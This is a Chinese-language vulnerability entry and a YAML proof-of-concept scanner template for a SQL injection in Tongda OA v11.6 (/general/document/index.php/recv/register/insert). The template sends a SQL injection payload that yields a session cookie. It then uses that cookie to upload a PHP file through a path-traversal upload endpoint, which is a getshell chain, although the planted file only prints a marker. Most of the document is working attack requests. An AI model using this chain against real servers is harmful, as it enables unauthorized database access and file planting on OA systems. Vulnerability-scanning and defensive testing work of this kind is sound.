漏洞描述
通达OA v11.6 insert参数包含SQL注入漏洞,攻击者通过漏洞可获取数据库敏感信息
app="TDXK-通达OA"
发送请求包判断漏洞 /general/document/index.php/recv/register/insert 返回302则是存在漏洞,返回500则不存在
tongda-insert-sql-inject-getshell: 通达OA v11.6 insert SQL注入漏洞
PoC代码[已公开]
id: tongda-insert-sql-inject-getshell
info:
name: 通达OA v11.6 insert SQL注入漏洞
author: zan8in
severity: critical
verified: true
description: |
通达OA v11.6 insert参数包含SQL注入漏洞,攻击者通过漏洞可获取数据库敏感信息
app="TDXK-通达OA"
发送请求包判断漏洞 /general/document/index.php/recv/register/insert 返回302则是存在漏洞,返回500则不存在
reference:
- http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
- https://blog.csdn.net/weixin_39779975/article/details/111091529
set:
filename: randomLowercase(8) + ".php"
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /general/document/index.php/recv/register/insert
body: |
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
expression: response.status == 302 && response.headers["set-cookie"].contains("PHPSESSID=")
output:
search: '"PHPSESSID=(?P<mycookie>.*?);".bsubmatch(response.raw_header)'
mycookie: search["mycookie"]
r1:
request:
method: POST
path: /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.%3C%3E./.%3C%3E./.%3C%3E./
headers:
Cookie: "PHPSESSID={{mycookie}};_SERVER="
Content-Type: "multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}"
body: "\
--WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"FILE1\"; filename=\"{{filename}}\"\r\n\
\r\n\
<?php echo \"a1f1r1o1g1\";?>\r\n\
--WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.body.bcontains(bytes(filename))
expression: r0() && r1()